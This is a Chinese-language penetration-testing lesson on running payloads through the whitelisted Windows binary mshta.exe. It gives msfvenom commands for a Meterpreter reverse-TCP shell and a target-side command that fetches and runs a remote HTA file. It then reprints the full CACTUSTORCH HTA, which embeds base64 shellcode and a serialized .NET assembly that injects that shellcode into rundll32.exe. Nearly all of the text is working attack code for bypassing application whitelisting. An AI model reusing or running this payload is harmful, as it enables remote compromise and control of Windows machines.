第七十五课:基于白名单Mshta.exe执行payload第五季

Mshta简介:

Mshta.exe是微软Windows操作系统相关程序,英文全称Microsoft HTML Application,可翻译为微软超文本标记语言应用,用于执行.HTA文件。

说明:Mshta所在路径已被系统添加PATH环境变量中,因此,可直接执行Mshta.exe命令。

基于白名单Mshta.exe配置payload:

Windows 7 默认位置:

C:\Windows\System32\mshta.exe
C:\Windows\SysWOW64\mshta.exe

攻击机:192.168.1.4 Debian 靶机: 192.168.1.3 Windows 7

配置攻击机msf:

配置payload:

msfvenom ‐a x86 ‐‐platform windows ‐p windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=53 ‐f raw > shellcode.bin
cat shellcode.bin |base64 ‐w 0

靶机执行:

mshta.exe http://192.168.1.4/Micropoor.hta

附录:Micropoor.hta

注:x86 payload ```visual basic

' Usage: ' Choose a binary you want to inject into, default "rundll32.exe", you can use note pad.exe, calc.exe for example... ' Generate a 32 bit raw shellcode in whatever framework you want. Tested: Cobalt St rike, Metasploit Framework ' Run: cat payload.bin | base64 ‐w 0 ' Copy the base64 encoded payload into the code variable below. ' Replace with binary name that you want to inject into. This can be anything that exists both in SYSWOW64 and SYSTEM32 Dim binary : binary = "rundll32.exe"

' Base64 encoded 32 bit shellcode

Dim code : code = "/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1oMzIAAGh3czJfVGhMdyYHiej/0LiQAQAAKcRUUGgpgGsA/9VqCmjAqAEEaAIAADWJ5lBQUFBAUEBQaOoP3+D/1ZdqEFZXaJmldGH/1YXAdAr/Tgh17OhnAAAAagBqBFZXaALZyF//1Y P4AH42izZqQGgAEAAAVmoAaFikU+X/1ZNTagBWU1doAtnIX//Vg/gAfShYaABAAABqAFBoCy8PMP/VV2h1bk1h/9VeXv8MJA+FcP///+mb////AcMpxnXBw7vwtaJWagBT/9U="

Sub Debug(s)

End Sub

Sub SetVersion

End Sub

Function Base64ToStream(b)

Dim enc, length, ba, transform, ms

Set enc = CreateObject("System.Text.ASCIIEncoding")

length = enc.GetByteCount_2(b)

Set transform = CreateObject("System.Security.Cryptography.FromBase64Transform")

Set ms = CreateObject("System.IO.MemoryStream")

ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), 0, length), 0, ((length / 4) * 3)

ms.Position = 0

Set Base64ToStream = ms

End Function

Sub Run

Dim s, entry_class

s = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy" s = s & "AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph" s = s & "dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk" s = s & "ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD" s = s & "AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl" s = s & "RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU" s = s & "eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl" s = s & "cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90" s = s & "aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu" s = s & "MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH" s = s & "dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA" s = s & "ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw" s = s & "B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu" s = s & "dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA" s = s & "CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u" s = s & "SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5" s = s & "cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR" s = s & "AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA" s = s & "AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y" s = s & "bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh" s = s & "NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz" s = s & "ZW1ibHkGFwAAAARMb2FkCg8MAAAAAB4AAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA" s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy" s = s & "YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAkNhXWQAAAAAA" s = s & "AAAA4AAiIAsBMAAAFgAAAAYAAAAAAAByNQAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA" s = s & "AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAIDUA" s = s & "AE8AAAAAQAAAkAMAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA" s = s & "AAAALnRleHQAAAB4FQAAACAAAAAWAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAkAMAAABA" s = s & "AAAABAAAABgAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAcAAAAAAAAAAAA" s = s & "AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAFQ1AAAAAAAASAAAAAIABQD4IQAAKBMAAAEAAAAAAAAA" s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgIoDwAACioT" s = s & "MAoABwEAAAEAABEEKBAAAAoKEgEGjmkoEQAACnMJAAAGDAgWfTUAAARyAQAAcBMEcgMAAHAoEgAA" s = s & "Cm8TAAAKFjEZch0AAHAoEgAACnIrAABwAygUAAAKEwQrF3IdAABwKBIAAApyQQAAcAMoFAAAChME" s = s & "EQQUFBQXGn4VAAAKFAgSAygBAAAGJgl7BAAABBMFEgUoFgAACnJXAABwKBcAAAosbhEFFnMRAAAK" s = s & "ByAAMAAAH0AoAgAABhMGEgYoFgAACnJXAABwKBgAAAosChEFFigEAAAGJioWEwcSCAaOaSgRAAAK" s = s & "EQURBgYRCBEHKAMAAAYmEQUWcxEAAAoWEQYWcxEAAAoWFnMRAAAKKAUAAAYmKnoCfhUAAAp9AgAA" s = s & "BAIoDwAACgICKBkAAAp9AQAABCoAABMwAgBgAAAAAAAAAAJ+FQAACn0rAAAEAn4VAAAKfSwAAAQC" s = s & "fhUAAAp9LQAABAJ+FQAACn04AAAEAn4VAAAKfTkAAAQCfhUAAAp9OgAABAJ+FQAACn07AAAEAigP" s = s & "AAAKAgIoGQAACn0qAAAEKkJTSkIBAAEAAAAAAAwAAAB2Mi4wLjUwNzI3AAAAAAUAbAAAACgHAAAj" s = s & "fgAAlAcAAEwJAAAjU3RyaW5ncwAAAADgEAAAXAAAACNVUwA8EQAAEAAAACNHVUlEAAAATBEAANwB" s = s & "AAAjQmxvYgAAAAAAAAACAAABVx0CFAkCAAAA+gEzABYAAAEAAAAXAAAACQAAAFAAAAAJAAAAHwAA" s = s & "ABkAAAAzAAAAEgAAAAEAAAABAAAABQAAAAEAAAABAAAABwAAAAAAmQYBAAAAAAAGAFwFkgcGAMkF" s = s & "kgcGAIoEYAcPALIHAAAGALIE4QYGADAF4QYGABEF4QYGALAF4QYGAHwF4QYGAJUF4QYGAMkE4QYG" s = s & "AJ4EcwcGAHwEcwcGAPQE4QYGAKsIqQYGAGEEqQYGAE0FqQYGALAGqQYGAMoIqQYGAFkHqQYGAL4I" s = s & "qQYGAGYGqQYGAIQGcwcAAAAAJQAAAAAAAQABAAEAEABtBgAAPQABAAEACgAQAPgHAAA9AAEACAAK" s = s & "ARAAzgYAAEEABAAJAAIBAAAbCAAASQAIAAkAAgEAADYIAABJACcACQAKABAABgcAAD0AKgAJAAIB" s = s & "AABtBAAASQA8AAoAAgEAAPMGAABJAEUACgAGAH0G+gAGAEQHPwAGACQE/QAGAHQIPwAGAOcDPwAG" s = s & "AMgD+gAGAL0D+gAGBp4DAAFWgLICAwFWgMACAwFWgGQAAwFWgIgCAwFWgMIAAwFWgFMCAwFWgPEB" s = s & "AwFWgB0CAwFWgAUCAwFWgKABAwFWgAIDAwFWgF4BAwFWgEgBAwFWgOEBAwFWgE0CAwFWgDECAwFW" s = s & "gGoDAwFWgIIDAwFWgJkCAwFWgB0DAwFWgHYBAwFWgHUAAwFWgD0AAwFWgCcBAwFWgKgAAwFWgDoD" s = s & "AwFWgLkBAwFWgBgBAwFWgMYBAwFWgOUCAwEGBp4DAAFWgJEABwFWgHICBwEGAKYD+gAGAO8DPwAG" s = s & "ABcHPwAGADMEPwAGAEsD+gAGAJoD+gAGAOcF+gAGAO8F+gAGAEcI+gAGAFUI+gAGAOQE+gAGAC4I" s = s & "+gAGAOcICwEGAA0ACwEGABkAPwAGANIIPwAGANwIPwAGADQHPwAGBp4DAAFWgN4CDgFWgO8ADgFW" s = s & "gJ0BDgFWgNgCDgFWgNUBDgFWgA8BDgFWgJQBDgFWgAMBDgEGBp4DAAFWgOcAEgFWgFcAEgFWgNUA" s = s & "EgFWgFgDEgFWgGkCEgFWgE8DEgFWgN0AEgFWgGADEgFWgBEGEgFWgCQGEgFWgDkGEgEAAAAAgACW" s = s & "IC4AFgEBAAAAAACAAJYg8wgqAQsAAAAAAIAAliAJCTUBEAAAAAAAgACWIGMIPwEVAAAAAACAAJEg" s = s & "1ANFARcAUCAAAAAAhhg+BwYAHgBYIAAAAACGAE0EUAEeAGshAAAAAIYYPgcGACAAjCEAAAAAhhg+" s = s & "BwYAIAAAAAEAOwQAAAIAUwQAAAMA5AcAAAQA0QcAAAUAwQcAAAYACwgAAAcAvAgAAAgAHAkBAAkA" s = s & "BAcCAAoAzAYAAAEAGwQAAAIAiwgAAAMAAwYAAAQAawQAAAUAsggAAAEAdAgAAAIAfQgAAAMAIQcA" s = s & "AAQAAwYAAAUAtQYAAAEAdAgAAAIA+gMAAAEAdAgAAAIA0QcAAAMA9wUAAAQAlQgAAAUAKAcAAAYA" s = s & "CwgAAAcAsgMAAAEAAgkAAAIAAQAJAD4HAQARAD4HBgAZAD4HCgApAD4HEAAxAD4HEAA5AD4HEABB" s = s & "AD4HEABJAD4HEABRAD4HEABZAD4HEABhAD4HFQBpAD4HEABxAD4HEACJAD4HBgB5AD4HBgCZAFMG" s = s & "KQChAD4HAQCpAAQELwCxAHkGNACxAKQIOAChABIHPwChAGQGQgCxADsJRgCxAC8JRgC5AAoGTAAJ" s = s & "ACQAWgAJACgAXwAJACwAZAAJADAAaQAJADQAbgAJADgAcwAJADwAeAAJAEAAfQAJAEQAggAJAEgA" s = s & "hwAJAEwAjAAJAFAAkQAJAFQAlgAJAFgAmwAJAFwAoAAJAGAApQAJAGQAqgAJAGgArwAJAGwAtAAJ" s = s & "AHAAuQAJAHQAvgAJAHgAwwAJAHwAyAAJAIAAzQAJAIQA0gAJAIgA1wAJAIwA3AAJAJAA4QAJAJQA" s = s & "5gAJAJgA6wAJAKAAWgAJAKQAXwAJAPQAlgAJAPgAmwAJAPwA8AAJAAABuQAJAAQB4QAJAAgB9QAJ" s = s & "AAwBvgAJABABwwAJABgBbgAJABwBcwAJACABeAAJACQBfQAJACgBWgAJACwBXwAJADABZAAJADQB" s = s & "aQAJADgBggAJADwBhwAJAEABjAAuAAsAVgEuABMAXwEuABsAfgEuACMAhwEuACsAhwEuADMAmAEu" s = s & "ADsAmAEuAEMAhwEuAEsAhwEuAFMAmAEuAFsAngEuAGMApAEuAGsAzgFDAFsAngGjAHMAWgDDAHMA" s = s & "WgADAXMAWgAjAXMAWgAaAIwGAAEDAC4AAQAAAQUA8wgBAAABBwAJCQEAAAEJAGMIAQAAAQsA1AMB" s = s & "AASAAAABAAAAAAAAAAAAAAAAAPcAAAACAAAAAAAAAAAAAABRAKkDAAAAAAMAAgAEAAIABQACAAYA" s = s & "AgAHAAIACAACAAkAAgAAAAAAAHNoZWxsY29kZTMyAGNiUmVzZXJ2ZWQyAGxwUmVzZXJ2ZWQyADxN" s = s & "b2R1bGU+AENyZWF0ZVByb2Nlc3NBAENSRUFURV9CUkVBS0FXQVlfRlJPTV9KT0IARVhFQ1VURV9S" s = s & "RUFEAENSRUFURV9TVVNQRU5ERUQAUFJPQ0VTU19NT0RFX0JBQ0tHUk9VTkRfRU5EAERVUExJQ0FU" s = s & "RV9DTE9TRV9TT1VSQ0UAQ1JFQVRFX0RFRkFVTFRfRVJST1JfTU9ERQBDUkVBVEVfTkVXX0NPTlNP" s = s & "TEUARVhFQ1VURV9SRUFEV1JJVEUARVhFQ1VURQBSRVNFUlZFAENBQ1RVU1RPUkNIAFdSSVRFX1dB" s = s & "VENIAFBIWVNJQ0FMAFBST0ZJTEVfS0VSTkVMAENSRUFURV9QUkVTRVJWRV9DT0RFX0FVVEhaX0xF" s = s & "VkVMAENSRUFURV9TSEFSRURfV09XX1ZETQBDUkVBVEVfU0VQQVJBVEVfV09XX1ZETQBQUk9DRVNT" s = s & "X01PREVfQkFDS0dST1VORF9CRUdJTgBUT1BfRE9XTgBHTwBDUkVBVEVfTkVXX1BST0NFU1NfR1JP" s = s & "VVAAUFJPRklMRV9VU0VSAFBST0ZJTEVfU0VSVkVSAExBUkdFX1BBR0VTAENSRUFURV9GT1JDRURP" s = s & "UwBJRExFX1BSSU9SSVRZX0NMQVNTAFJFQUxUSU1FX1BSSU9SSVRZX0NMQVNTAEhJR0hfUFJJT1JJ" s = s & "VFlfQ0xBU1MAQUJPVkVfTk9STUFMX1BSSU9SSVRZX0NMQVNTAEJFTE9XX05PUk1BTF9QUklPUklU" s = s & "WV9DTEFTUwBOT0FDQ0VTUwBEVVBMSUNBVEVfU0FNRV9BQ0NFU1MAREVUQUNIRURfUFJPQ0VTUwBD" s = s & "UkVBVEVfUFJPVEVDVEVEX1BST0NFU1MAREVCVUdfUFJPQ0VTUwBERUJVR19PTkxZX1RISVNfUFJP" s = s & "Q0VTUwBSRVNFVABDT01NSVQAQ1JFQVRFX0lHTk9SRV9TWVNURU1fREVGQVVMVABDUkVBVEVfVU5J" s = s & "Q09ERV9FTlZJUk9OTUVOVABFWFRFTkRFRF9TVEFSVFVQSU5GT19QUkVTRU5UAENSRUFURV9OT19X" s = s & "SU5ET1cAZHdYAFJFQURPTkxZAEVYRUNVVEVfV1JJVEVDT1BZAElOSEVSSVRfUEFSRU5UX0FGRklO" s = s & "SVRZAElOSEVSSVRfQ0FMTEVSX1BSSU9SSVRZAGR3WQB2YWx1ZV9fAGNiAG1zY29ybGliAGxwVGhy" s = s & "ZWFkSWQAZHdUaHJlYWRJZABkd1Byb2Nlc3NJZABDcmVhdGVSZW1vdGVUaHJlYWQAaFRocmVhZABs" s = s & "cFJlc2VydmVkAHVFeGl0Q29kZQBHZXRFbnZpcm9ubWVudFZhcmlhYmxlAGxwSGFuZGxlAGJJbmhl" s = s & "cml0SGFuZGxlAGxwVGl0bGUAbHBBcHBsaWNhdGlvbk5hbWUAZmxhbWUAbHBDb21tYW5kTGluZQBW" s = s & "YWx1ZVR5cGUAZmxBbGxvY2F0aW9uVHlwZQBHdWlkQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1" s = s & "dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJh" s = s & "ZGVtYXJrQXR0cmlidXRlAGR3RmlsbEF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmli" s = s & "dXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0" s = s & "cmlidXRlAEZsYWdzQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNz" s = s & "ZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5" s = s & "Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBkd1hTaXplAGR3" s = s & "WVNpemUAZHdTdGFja1NpemUAZHdTaXplAFNpemVPZgBHVUFSRF9Nb2RpZmllcmZsYWcATk9DQUNI" s = s & "RV9Nb2RpZmllcmZsYWcAV1JJVEVDT01CSU5FX01vZGlmaWVyZmxhZwBGcm9tQmFzZTY0U3RyaW5n" s = s & "AFRvU3RyaW5nAGNhY3R1c1RvcmNoAGdldF9MZW5ndGgATWFyc2hhbABrZXJuZWwzMi5kbGwAQ0FD" s = s & "VFVTVE9SQ0guZGxsAFN5c3RlbQBFbnVtAGxwTnVtYmVyT2ZCeXRlc1dyaXR0ZW4AbHBQcm9jZXNz" s = s & "SW5mb3JtYXRpb24AU3lzdGVtLlJlZmxlY3Rpb24ATWVtb3J5UHJvdGVjdGlvbgBscFN0YXJ0dXBJ" s = s & "bmZvAFplcm8AbHBEZXNrdG9wAGJ1ZmZlcgBscFBhcmFtZXRlcgBoU3RkRXJyb3IALmN0b3IAbHBT" s = s & "ZWN1cml0eURlc2NyaXB0b3IASW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBTeXN0ZW0uUnVudGlt" s = s & "ZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dp" s = s & "bmdNb2RlcwBiSW5oZXJpdEhhbmRsZXMAbHBUaHJlYWRBdHRyaWJ1dGVzAGxwUHJvY2Vzc0F0dHJp" s = s & "YnV0ZXMAU2VjdXJpdHlBdHRyaWJ1dGVzAGR3Q3JlYXRpb25GbGFncwBDcmVhdGVQcm9jZXNzRmxh" s = s & "Z3MAZHdGbGFncwBEdXBsaWNhdGVPcHRpb25zAGR3WENvdW50Q2hhcnMAZHdZQ291bnRDaGFycwBU" s = s & "ZXJtaW5hdGVQcm9jZXNzAGhQcm9jZXNzAGxwQmFzZUFkZHJlc3MAbHBBZGRyZXNzAGxwU3RhcnRB" s = s & "ZGRyZXNzAENvbmNhdABPYmplY3QAZmxQcm90ZWN0AGxwRW52aXJvbm1lbnQAQ29udmVydABoU3Rk" s = s & "SW5wdXQAaFN0ZE91dHB1dAB3U2hvd1dpbmRvdwBWaXJ0dWFsQWxsb2NFeABiaW5hcnkAV3JpdGVQ" s = s & "cm9jZXNzTWVtb3J5AGxwQ3VycmVudERpcmVjdG9yeQBvcF9FcXVhbGl0eQBvcF9JbmVxdWFsaXR5" s = s & "AAAAAAABABlQAHIAbwBnAHIAYQBtAFcANgA0ADMAMgAADXcAaQBuAGQAaQByAAAVXABTAHkAcwBX" s = s & "AE8AVwA2ADQAXAAAFVwAUwB5AHMAdABlAG0AMwAyAFwAAAMwAAAARY+bzuLqxE+aSSAzLsphXgAE" s = s & "IAEBCAMgAAEFIAEBEREEIAEBDgQgAQECDgcJHQUYEhwREA4YGAgYBQABHQUOBAABDg4DIAAIBgAD" s = s & "Dg4ODgIGGAMgAA4FAAICDg4EAAEIHAi3elxWGTTgiQQBAAAABAIAAAAEBAAAAAQIAAAABBAAAAAE" s = s & "IAAAAARAAAAABIAAAAAEAAEAAAQAAgAABAAEAAAEAAgAAAQAEAAABAAgAAAEAEAAAAQAgAAABAAA" s = s & "AQAEAAACAAQAAAQABAAACAAEAAAQAAQAACAABAAAAAEEAAAAAgQAAAAEBAAAAAgEAAAAEAQAAAAg" s = s & "BAAAAEAEAAAAgAQAMAAABAAAQAACBggCBgICBgkDBhEUAwYRGAIGBgMGESADBhEkEwAKGA4OEgwS" s = s & "DAIRFBgOEhwQERAKAAUYGBgYESARJAkABQIYGB0FGAgFAAICGAkKAAcYGBgJGBgJGAUgAgEODggB" s = s & "AAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEIAQACAAAAAAAQAQALQ0FDVFVT" s = s & "VE9SQ0gAAAUBAAAAAAUBAAEAACkBACQ1NjU5OGYxYy02ZDg4LTQ5OTQtYTM5Mi1hZjMzN2FiZTU3" s = s & "NzcAAAwBAAcxLjAuMC4wAAAASDUAAAAAAAAAAAAAYjUAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAA" s = s & "AFQ1AAAAAAAAAAAAAAAAX0NvckRsbE1haW4AbXNjb3JlZS5kbGwAAAAAAP8lACAAEAAAAAAAAAAA" s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAA" s = s & "ADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAANAMAAAAAAAAAAAAANAM0AAAAVgBTAF8A" s = s & "VgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAAAD8AAAAA" s = s & "AAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQA" s = s & "BAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBJQCAAABAFMAdAByAGkAbgBnAEYAaQBs" s = s & "AGUASQBuAGYAbwAAAHACAAABADAAMAAwADAAMAA0AGIAMAAAADAADAABAEMAbwBtAG0AZQBuAHQA" s = s & "cwAAAEMAQQBDAFQAVQBTAFQATwBSAEMASAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAA" s = s & "AAAAAAAAAEAADAABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABDAEEAQwBUAFUA" s = s & "UwBUAE8AUgBDAEgAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAu" s = s & "ADAAAABAABAAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEMAQQBDAFQAVQBTAFQATwBSAEMA" s = s & "SAAuAGQAbABsAAAAPAAMAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAQwBBAEMAVABV" s = s & "AFMAVABPAFIAQwBIAAAAKgABAAEATABlAGcAYQBsAFQAcgBhAGQAZQBtAGEAcgBrAHMAAAAAAAAA" s = s & "AABIABAAAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAAQwBBAEMAVABVAFMAVABP" s = s & "AFIAQwBIAC4AZABsAGwAAAA4AAwAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEMAQQBDAFQA" s = s & "VQBTAFQATwBSAEMASAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAw" s = s & "AC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAA" s = s & "LgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" s = s & "AAAAAAAAAAAAAAAAADAAAAwAAAB0NQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" s = s & "AAAAAAAAAAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVmbGVjdGlv"

s = s & "bi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA"

entry_class = "cactusTorch"

Dim fmt, al, d, o

Set fmt = CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter")

Set al = CreateObject("System.Collections.ArrayList")

al.Add fmt.SurrogateSelector

Set d = fmt.Deserialize_2(Base64ToStream(s))

Set o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class)

o.flame binary,code

End Sub

SetVersion

On Error Resume Next

Run

If Err.Number <> 0 Then

Debug Err.Description

Err.Clear

End If

self.close

</script>

```

来源: https://raw.githubusercontent.com/mdsecactivebreach/CACTUSTORCH/master/CACTUSTORCH.hta

Micropoor

Last updated